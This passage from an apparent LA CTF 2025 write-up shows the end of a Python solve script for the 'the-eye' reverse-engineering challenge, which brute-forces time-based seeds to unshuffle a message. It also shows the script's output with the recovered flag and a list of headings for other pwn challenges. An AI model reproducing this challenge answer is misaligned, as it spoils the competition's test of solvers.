    message = "soolliWssiptre. e2se.h eparthngnutrer uosmegm_yah  elf,non rerltnhi;eneddah cv idonfiur u eo.l  e mnaf ee rtgar heeomamccl hoehcor. ihew_h oacyomeht_leysnh ryheeEamsciabcnex ce tOa  gyeu suteosnt h- tosssa tnaede d  ipxhsmpoep,m rneiadiWdnetcdpn iisefiro es e}eer o ear,nyrhee at laestt o ts seesoatfhsan  sopeeoe EdsetepdydrlaaHtaa alocligetl gldeaer tAvc ?i sntaat  decessea  dtnent tihci fhsrso ser aehaeedssoguuTpct edlnslraielu rntp dhdra mt s aeltl  e_ner aa,n,eude pant -nnsnv in gwptiiyeetda ahespt ,cyxestssrnutthioceuit,{t itna a tw lemggetnnHsyfshss_ssv l  thpaui  eoc2eg tetlggnaasym  vn   ia _etivaotnsetd rtpirr   ly ytoaeedihreltee iswetntorginN  si  atgenar se  dbi tflrnoncaadimlm nanuhho  rxaeoo_ meae pihttxie"
34
    seed = libc.time(0)
35

36
    while True:
37
        result = unshuffle(message, seed)
38
        if "lactf" in result.lower():
39
            return result, seed
40
        seed -= 1
41

42
result, final_seed = find_flag()
43
print(f"Found with seed: {final_seed}")
44
print(f"Result: {result}")

Get flag

1
$ python3 solve.py
2

3
Random numbers for seed 1739419079:
4
<...>
5
Round 22:
6
548 176 441 643 298 514 133 566 578 422 209 263 264 400 479 418 703 424 262 368 289 59 492 389 676 676 477 398 191 8 573 384 191 535 117 610 673 596 221 448 347 591 264 668 462 585 359 3 483 399 281 86 480 626 205 477 648 319 401 99 186 84 350 578 381 508 542 388 504 81 287 83 342 285 578 169 441 190 18 623 618 490 270 72 198 481 467 630 564 428 199 434 272 365 89 199 463 414 2 209 514 353 44 83 481 316 297 275 147 126 79 407 20 398 344 105 267 364 56 598 443 117 314 248 568 140 386 22 220 65 524 252 0 210 592 25 100 142 588 231 374 419 247 181 50 197 334 428 365 482 420 282 453 440 233 570 410 145 255 205 537 519 76 337 504 347 83 410 338 327 120 237 530 348 315 172 347 271 378 417 52 191 207 530 405 262 380 356 368 475 116 352 25 283 453 138 185 464 391 121 149 515 379 245 373 522 445 386 16 140 308 250 58 177 295 136 438 154 181 155 48 299 154 252 243 347 168 246 237 161 383 187 366 161 273 196 30 368 467 414 338 347 390 450 29 443 42 219 382 45 78 277 60 115 2 393 9 335 379 2 407 79 54 304 204 30 455 318 89 408 287 395 1 116 5 70 112 393 130 178 437 104 145 172 266 7 195 45 46 133 293 384 120 93 361 173 310 340 229 376 154 209 379 364 58 25 297 313 94 82 395 162 199 112 230 34 331 129 164 14 172 138 269 74 314 297 15 143 223 353 362 295 125 306 386 28 8 148 297 283 341 300 259 50 352 374 194 193 315 250 165 81 168 253 47 333 323 123 7 86 247 11 250 358 19 112 181 319 162 160 123 267 331 321 179 5 191 239 193 254 94 254 57 171 37 33 324 303 246 78 143 39 77 67 229 172 151 116 285 35 265 209 160 278 90 198 39 253 142 225 32 24 220 146 188 242 151 227 140 156 243 126 149 237 44 182 112 57 269 135 143 266 163 37 266 228 14 186 67 42 269 272 260 49 111 114 70 127 216 100 6 273 49 144 198 197 125 42 65 4 216 81 177 122 218 218 79 126 205 23 31 72 83 163 113 156 157 51 75 208 14 25 243 117 33 195 133 16 181 166 221 146 17 63 131 184 133 172 91 127 146 100 223 112 84 67 172 75 219 201 87 72 158 202 15 162 141 65 60 186 49 52 160 37 165 179 103 79 127 63 54 117 154 127 181 125 128 56 88 104 148 3 103 52 32 51 86 108 21 121 81 175 32 17 49 149 143 144 89 11 104 51 124 124 46 85 70 139 86 131 110 22 149 112 24 109 26 9 15 28 60 73 86 43 34 131 20 96 127 119 73 134 110 64 47 22 42 17 36 71 26 78 4 116 34 69 45 74 118 51 103 111 1 50 44 55 106 93 106 9 40 2 50 96 15 7 24 86 90 92 70 29 78 21 34 45 35 1 80 52 58 61 53 10 38 17 64 36 39 42 45 63 17 37 20 9 14 20 50 17 6 61 33 28 24 14 7 19 15 33 51 2 6 50 12 52 7 6 26 46 12 9 9 9 42 24 2 2 38 38 30 28 20 25 30 17 24 11 25 3 21 24 23 6 19 1 15 12 0 18 6 0 12 13 8 2 6 2 6 5 5 6 5 4 1 1 1 0
7

8
Found with seed: 1739419063
9
Result: Outer Wilds is an action-adventure video game set in a small planetary system in which the player character, an unnamed space explorer referred to as the Hatchling, explores and investigates its mysteries in a self-directed manner. Whenever the Hatchling dies, the game resets to the beginning; this happens regardless after 22 minutes of gameplay due to the sun going supernova. The player uses these repeated time loops to discover the secrets of the Nomai, an alien species that has left ruins scattered throughout the planetary system, including why the sun is exploding. A downloadable content expansion, Echoes of the Eye, adds additional locations and mysteries to the game. lactf{are_you_ready_to_learn_what_comes_next?}

[WRITE UP] - LA CTF 2025

pwn/2password

Description

Reverse Engineering

Exploit Development

Get flag

pwn/state-change

Description

Analysis

Exploit Development

Get flag

pwn/minceraft

Description

Analysis

Exploit Development

Get flag

rev/the-eye

Description

Analysis

Script

Get flag